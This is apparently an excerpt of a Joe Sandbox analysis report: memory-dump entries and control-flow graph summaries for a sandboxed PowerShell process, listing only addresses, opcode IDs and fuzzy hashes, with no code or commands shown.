                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (&fq
                                                                                          • API String ID: 0-1822945044
                                                                                          • Opcode ID: 3ea6b2dddf0cfa82494c9105bf490651c26dcf3c605d9e8d0a4ab71f9dfb91a4
                                                                                          • Instruction ID: ad2d8e76e39b78d17123b4bc1e08bc8b05cf583cce16015143f53a15bd07734d
                                                                                          • Opcode Fuzzy Hash: 3ea6b2dddf0cfa82494c9105bf490651c26dcf3c605d9e8d0a4ab71f9dfb91a4
                                                                                          • Instruction Fuzzy Hash: 9921A171E002598FCB14DFAED444BEFBBF5EB89320F14846AD418E7340DB7499058BA5

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 1025 bb29f0-bb2a1e 1027 bb2af5-bb2b37 1025->1027 1028 bb2a24-bb2a3a 1025->1028 1033 bb2b3d-bb2b56 1027->1033 1034 bb2c51-bb2c61 1027->1034 1029 bb2a3f-bb2a52 1028->1029 1030 bb2a3c 1028->1030 1029->1027 1035 bb2a58-bb2a65 1029->1035 1030->1029 1036 bb2b5b-bb2b69 1033->1036 1037 bb2b58 1033->1037 1038 bb2a6a-bb2a7c 1035->1038 1039 bb2a67 1035->1039 1036->1034 1043 bb2b6f-bb2b79 1036->1043 1037->1036 1038->1027 1044 bb2a7e-bb2a88 1038->1044 1039->1038 1045 bb2b7b-bb2b7d 1043->1045 1046 bb2b87-bb2b94 1043->1046 1048 bb2a8a-bb2a8c 1044->1048 1049 bb2a96-bb2aa6 1044->1049 1045->1046 1046->1034 1047 bb2b9a-bb2baa 1046->1047 1050 bb2baf-bb2bbd 1047->1050 1051 bb2bac 1047->1051 1048->1049 1049->1027 1052 bb2aa8-bb2ab2 1049->1052 1050->1034 1057 bb2bc3-bb2bd3 1050->1057 1051->1050 1053 bb2ac0-bb2af4 1052->1053 1054 bb2ab4-bb2ab6 1052->1054 1054->1053 1058 bb2bd8-bb2be5 1057->1058 1059 bb2bd5 1057->1059 1058->1034 1062 bb2be7-bb2bf7 1058->1062 1059->1058 1063 bb2bf9 1062->1063 1064 bb2bfc-bb2c08 1062->1064 1063->1064 1064->1034 1066 bb2c0a-bb2c24 1064->1066 1067 bb2c29 1066->1067 1068 bb2c26 1066->1068 1069 bb2c2e-bb2c38 1067->1069 1068->1067 1070 bb2c3d-bb2c50 1069->1070
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 51290a5537a1ca0fefec2c265a6a5427b4906f8e920ee40972772e69eec561ef
                                                                                          • Instruction ID: 0d1bad38db41e822c900678e64fdee50138ec82dc34ddbbd87833e14f2b1e484
                                                                                          • Opcode Fuzzy Hash: 51290a5537a1ca0fefec2c265a6a5427b4906f8e920ee40972772e69eec561ef
                                                                                          • Instruction Fuzzy Hash: 39918C74A002059FCB15CF59C4949BEFBF1FF88310B2486A9D815AB3A5C775EC51CBA0

                                                                                          Control-flow Graph (rendered graph omitted; executed / not-executed colouring not recoverable): basic blocks bbbab8 through bbbcce, entry block bbbab8-bbbac0, with calls to bbafa0 and bba694
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 34704c40bf0cbf282b67614a8dac0e38eaa7012f658268aea4743e9ee0bccf45
                                                                                          • Instruction ID: 2074d369243caea79fc493a72aec23d4c40cbcf2f2dd5e42cad3aa24296f5b32
                                                                                          • Opcode Fuzzy Hash: 34704c40bf0cbf282b67614a8dac0e38eaa7012f658268aea4743e9ee0bccf45
                                                                                          • Instruction Fuzzy Hash: 226115B1E002489FCB14DFA9D585ADDBFF1EF88310F18816AE819EB351EBB09941CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b1ff927bcf6953866db528d33984b4c16612af5416e4a035e1e7a6a20a661845
                                                                                          • Instruction ID: 92067c364899f282b6c810f2c132d5a968fe8bac3edc30b74b189b79401bf47c
                                                                                          • Opcode Fuzzy Hash: b1ff927bcf6953866db528d33984b4c16612af5416e4a035e1e7a6a20a661845
                                                                                          • Instruction Fuzzy Hash: 9651BD347082059FD705CB79D894ABA7BE6EFC9314B1589A9E409CB392EF71DC41CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5fdaa65d3106ef8051cedbe8d8b4fcb57bbc447f70a4f842b97f5a305cba1532
                                                                                          • Instruction ID: 2279f920fef29e076c8871192e3242a6dae0862446afa10c42a03f7875d7dcb3
                                                                                          • Opcode Fuzzy Hash: 5fdaa65d3106ef8051cedbe8d8b4fcb57bbc447f70a4f842b97f5a305cba1532
                                                                                          • Instruction Fuzzy Hash: F861F7B1E002489FCB14DFA9D585ADDBBF1EF88310F18816AE419AB354EBB49D41CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a95dacaf372ab9efb7f5b7184058e003d3ba53fbbcc7a83b16c7e511e56dec62
                                                                                          • Instruction ID: cea96e27138ce9b61eed49e869bd75a8ab3ecd4e2d071a5652654da5be5d67de
                                                                                          • Opcode Fuzzy Hash: a95dacaf372ab9efb7f5b7184058e003d3ba53fbbcc7a83b16c7e511e56dec62
                                                                                          • Instruction Fuzzy Hash: B34124B1B21242CBDF39CE28C5017AABBA2AF85714F1840A5D900BF257D731DC84CBA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2c1810e66db4a57371c42696c917391cca1b6e11d5b186a9e081a360f46d2770
                                                                                          • Instruction ID: 3a953a3871d0bb28748f08100287ec8ab74da045dba8c28056d1602d678afe67
                                                                                          • Opcode Fuzzy Hash: 2c1810e66db4a57371c42696c917391cca1b6e11d5b186a9e081a360f46d2770
                                                                                          • Instruction Fuzzy Hash: 8B4114B4A006099FCB15CF59C4989FEFBB1FF48310B2582A9D815AB364C776EC51CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 58a61110d69e3b15302f8cb0c2ee1dfb4cbaec7d5bdf70ba6afb4596ba480af1
                                                                                          • Instruction ID: ec707a638eddabae410f051d1aac8e2c6e36d9c8c0d417716125a7c9be171849
                                                                                          • Opcode Fuzzy Hash: 58a61110d69e3b15302f8cb0c2ee1dfb4cbaec7d5bdf70ba6afb4596ba480af1
                                                                                          • Instruction Fuzzy Hash: 0C416D34A182448FCB05DB68C564AEABFF1EF8E311F1844DAD442AB3A2CB719C41CF61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b6320387e92484b3c422a03834f8ff94a6312d6e53abfe33ce58ff9ae629c3a4
                                                                                          • Instruction ID: e31821f1f5ab452cc016ed2bf18a557b05e82541e8e96fbe8fb27574ddb041de
                                                                                          • Opcode Fuzzy Hash: b6320387e92484b3c422a03834f8ff94a6312d6e53abfe33ce58ff9ae629c3a4
                                                                                          • Instruction Fuzzy Hash: 2A31A2713006019FD709EB78E894BAABBD6EFC4310F048569E519CB351EFB0AD458BA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a67c7c5fd782569400cfd4617eb1e9cec4bea67f4ddafc8aa77f83f6423161af
                                                                                          • Instruction ID: f8d82c1e34bba003343cd8b7bb5b7bde2c4d54621bc752c595f4a677fb353e40
                                                                                          • Opcode Fuzzy Hash: a67c7c5fd782569400cfd4617eb1e9cec4bea67f4ddafc8aa77f83f6423161af
                                                                                          • Instruction Fuzzy Hash: C13138B0E002099BCB08EFB9D4957FEBBF6EF88300F148069E501E7350EAB49C418B91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 05f6549f928ac145600ce4c7bc5ea8529eaaa1ee12a734ad6fbdf8614748d5dc
                                                                                          • Instruction ID: 9cd3d034ed18d861b2ed2603d15e57d2d9609041994b636c8bfa806cab29df9a
                                                                                          • Opcode Fuzzy Hash: 05f6549f928ac145600ce4c7bc5ea8529eaaa1ee12a734ad6fbdf8614748d5dc
                                                                                          • Instruction Fuzzy Hash: CB3181B4E002099FDB04EF64D855AFE7BF6EF84300F1584A9E511AB3A5DA749E418FA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b69e99c2769cc3e3d493492ce5a0269533cfd0005fcafd05292d627d53431054
                                                                                          • Instruction ID: 61a1ff2136b9c055f93487d81cb0aa9076752552b87d7568de87649c01524ad6
                                                                                          • Opcode Fuzzy Hash: b69e99c2769cc3e3d493492ce5a0269533cfd0005fcafd05292d627d53431054
                                                                                          • Instruction Fuzzy Hash: 64311AB0E002099BDB45DFB9D4957FEBBF6EF89300F148069E405EB350EAB49C418B51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 429b939061e9cfa7114a43593a96156019d0226ca7fbb7e479bfb6e04ecef736
                                                                                          • Instruction ID: 7692841f0b5a5cf5702e0f181cfa6eded28503ba3c38cc884dfb831b349d4ba0
                                                                                          • Opcode Fuzzy Hash: 429b939061e9cfa7114a43593a96156019d0226ca7fbb7e479bfb6e04ecef736
                                                                                          • Instruction Fuzzy Hash: 5D31BCB59017049FDB60DF6AD0897DAFBF2EF88320F28C05AD55D97304D7B468818B51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a7c8f8cc70a797e7ae1660bf9eb48ee19f24124df7d6a532cac055e7304819e1
                                                                                          • Instruction ID: b92130c6c277c6d0e110f5750d3d9772b796f0a58a73cc9d4e28b78ef0836410
                                                                                          • Opcode Fuzzy Hash: a7c8f8cc70a797e7ae1660bf9eb48ee19f24124df7d6a532cac055e7304819e1
                                                                                          • Instruction Fuzzy Hash: 1D218DB9A30207DFEB28CF6BC541B697BE1BB45321F04C0A6F8059B251D774D944CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 88c941829b19acaa9a1ce88d015ca08460894cd0faf5ee42abe0f0fc37c2e077
                                                                                          • Instruction ID: 50d8e6674fd24f8d651b3d18ede4410822914b779aaba81128d9be3a5526e645
                                                                                          • Opcode Fuzzy Hash: 88c941829b19acaa9a1ce88d015ca08460894cd0faf5ee42abe0f0fc37c2e077
                                                                                          • Instruction Fuzzy Hash: E03181B4E002099FDB04EFA4D855AFE7BF6EF84300F1184A9E115AB395DE749E418F90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 57764560808f2d5f073ec57817e9593ef9f33c51d1ed82fa0a15ee416b34568b
                                                                                          • Instruction ID: 704727b6aa4713ab971a9eb3c97533ee374983a4c6321d299c8d827badfa4df6
                                                                                          • Opcode Fuzzy Hash: 57764560808f2d5f073ec57817e9593ef9f33c51d1ed82fa0a15ee416b34568b
                                                                                          • Instruction Fuzzy Hash: 25210272504201EFCF05CF54D9C0B27BBA5FB88314F64C5ADE9090A356C336C896CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 78d78b8cbcf497e670682178056c592b4d3260f02a304c25e1295f416304f16b
                                                                                          • Instruction ID: 3cd451085972c58fa11fb10225811b3eda86c0427e2895c8b51de41c709c6b42
                                                                                          • Opcode Fuzzy Hash: 78d78b8cbcf497e670682178056c592b4d3260f02a304c25e1295f416304f16b
                                                                                          • Instruction Fuzzy Hash: 482125B5504201DFCB14CF14C9C4B66BBA5EB88314F64C5BDD90A4B252C336D886CA61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb182fe34ca60e8bcf09931e04dc3dbeb0162c9e71ff173f39593e14fc4b73e7
                                                                                          • Instruction ID: 174883b8854e837e4a3f2552fa28dc0d440d3987821a153cd9f56b17c005b26b
                                                                                          • Opcode Fuzzy Hash: cb182fe34ca60e8bcf09931e04dc3dbeb0162c9e71ff173f39593e14fc4b73e7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e109addab00f0d5d8e2a43e6a8a5727f0c5b76838343313d9aef1181b3a39983
                                                                                          • Instruction ID: d290de70fcb95c9c6960c6ddfb07bbbcf56d9b4bb0ba7622941e7909bd91973a
                                                                                          • Opcode Fuzzy Hash: e109addab00f0d5d8e2a43e6a8a5727f0c5b76838343313d9aef1181b3a39983
                                                                                          • Instruction Fuzzy Hash: 39F0A7B12002046BC304EB29D88499FBBD6EFC57647988ABEE10D8B711EE71AD4587E0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ce738edb0ff8d0f58d5b67d606fbdfb4a94534a7212ea126fa5879c0027e594c
                                                                                          • Instruction ID: 008dabcde86db9b0d4f1f67d15260c6ebc0d59d829b0de76775f3699d674466b
                                                                                          • Opcode Fuzzy Hash: ce738edb0ff8d0f58d5b67d606fbdfb4a94534a7212ea126fa5879c0027e594c
                                                                                          • Instruction Fuzzy Hash: A0F027B56041089BD300BB74C0153EB77E6DFC0714F60816ED91947389DE392942CBD0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c3fdf0c366058c2b31a60ac68c404a33319969c67c7c7afa3fb0f69f93d4c88e
                                                                                          • Instruction ID: 38514cca5f57cec7f32a1103967cb3fda82b0c6b38324f777254739e32fa30d2
                                                                                          • Opcode Fuzzy Hash: c3fdf0c366058c2b31a60ac68c404a33319969c67c7c7afa3fb0f69f93d4c88e
                                                                                          • Instruction Fuzzy Hash: 8AF0A0763005048FCB009BAC99405EA77E2EFC975171541A9E50ACB316EF64CC028B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 479f9c8f004ec895a6060e36907f64c76a200581470002a9729a6a28aa48ada0
                                                                                          • Instruction ID: 1f6d9a1dc36c94a9ba89a11853c54a30765b6907a7afb34befaed7e9f9ecebb0
                                                                                          • Opcode Fuzzy Hash: 479f9c8f004ec895a6060e36907f64c76a200581470002a9729a6a28aa48ada0
                                                                                          • Instruction Fuzzy Hash: 8EF0A77530C3555BC70B2774A81D2AE7BE5BF86724F040196EA1587382CF6D0A4583E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: def0d25fede34ffa2a17e27f2f86aae5b85c367f37607175ed1a1533272b6359
                                                                                          • Instruction ID: f20228d76697bf39e09a27fa6e946d9c2650a7b04c5f13a8244e8db6366f12be
                                                                                          • Opcode Fuzzy Hash: def0d25fede34ffa2a17e27f2f86aae5b85c367f37607175ed1a1533272b6359
                                                                                          • Instruction Fuzzy Hash: F1E01A393005108F8310AB1DD498CAAB7FAEFCE72575914AAF549CF731DAA2EC01DB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4b6fe94ba271f1982571c9c0acf70778a800e9b81c0de79592265fd6a22a29c8
                                                                                          • Instruction ID: b5c49bf31e95c31cb145923acb65e901bbaad86ea3b24d091133e4c745afa405
                                                                                          • Opcode Fuzzy Hash: 4b6fe94ba271f1982571c9c0acf70778a800e9b81c0de79592265fd6a22a29c8
                                                                                          • Instruction Fuzzy Hash: 2CF08CB0900705AFD760AF78D49939ABBE4FB00320F000829EA5EC3340DB386880CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 455f8145b46eaa01fe3db3ddf863aea38f7ed97e095b0550d287d43e74565674
                                                                                          • Instruction ID: b7c59b7104df9dcf728db5cd05a90c437d629da78312b1f60dcba3bff3d4cd29
                                                                                          • Opcode Fuzzy Hash: 455f8145b46eaa01fe3db3ddf863aea38f7ed97e095b0550d287d43e74565674
                                                                                          • Instruction Fuzzy Hash: 6CE09B3120171667C315661DD901EDB7BDAEFC5B617144469F41587204EF689D0187F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8db913abb0b7ca46d14229e0b685f4fcfb25ed4e038961683f648f471420b5bf
                                                                                          • Instruction ID: 7f379e3c91eb1ecd5091e8daeb3ce00015eaa3209e646681e562b63bd906f86c
                                                                                          • Opcode Fuzzy Hash: 8db913abb0b7ca46d14229e0b685f4fcfb25ed4e038961683f648f471420b5bf
                                                                                          • Instruction Fuzzy Hash: A1E0D871200200278118B25EDC8556EBACEDFC52B0358486DE10E97610DE306D4153A0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3210ac43db5bdb8c9fd56cf4713ddb2528a94cc6818e1ba9142b8b507ee4dca9
                                                                                          • Instruction ID: e85a09befed0f44fd2907643a03ec3dd99558aae6a7d88d022fb9477241b0263
                                                                                          • Opcode Fuzzy Hash: 3210ac43db5bdb8c9fd56cf4713ddb2528a94cc6818e1ba9142b8b507ee4dca9
                                                                                          • Instruction Fuzzy Hash: 8AF0ED709043045BD764ABB9D89D79A7BE9FB44360F004869E65ED7340DB796980CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de2bb46a650ec26ef628497782fbb420880b60a0dc77d0f400c4a820b8daf7a8
                                                                                          • Instruction ID: 9e07c8a06f908282a47694d4287f8212ea1ce88c05e53b23a7b262394a750595
                                                                                          • Opcode Fuzzy Hash: de2bb46a650ec26ef628497782fbb420880b60a0dc77d0f400c4a820b8daf7a8
                                                                                          • Instruction Fuzzy Hash: F9E0267530861847CB093774A80D2EE7AE6FBC5730F00012AE62A83381CF7C1A0183D5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 063988b8d37f732897105fec193eaf9e8a3bd40a60dfd45ff3995c41395187ba
                                                                                          • Instruction ID: a5bcfaa999e3b96d8745c965546aef777aa4b68ae033baacefe3ae6066aafb15
                                                                                          • Opcode Fuzzy Hash: 063988b8d37f732897105fec193eaf9e8a3bd40a60dfd45ff3995c41395187ba
                                                                                          • Instruction Fuzzy Hash: D1D05E927412251B85A436EA18416FBA9CFCAC56E070901BAAB05C3342ECC0DC0243F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: 8b84720c6c6d4c812e983de57b742a610ac4d37178cdc486e11501742405011d
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: 9DE08631B04014978B08969DD4504F9F7B5DFCC320F14847AD90AA7340DA725916C691
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 32e82ff4733414925b45a4ce4e40712503c8b855b42a26415d2ac1b6eefbad1f
                                                                                          • Instruction ID: aa552e0dea7d2aa6e114de94cf031be0f7d1e3108b150c3fdc04c3262e4efb32
                                                                                          • Opcode Fuzzy Hash: 32e82ff4733414925b45a4ce4e40712503c8b855b42a26415d2ac1b6eefbad1f
                                                                                          • Instruction Fuzzy Hash: 69E0C23230061857C625A62EA8108EF7BDBEFC8B7131444BEE029C7300FEA8DD0187E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ed6065e81fd42fc84e527eb8cfce3526a5ddaaf063461063ff3e220ee69e14db
                                                                                          • Instruction ID: b3a9d4727a0a11d98ab8c19fe2d91f9234708304282bd1caaa05d9746c1c2847
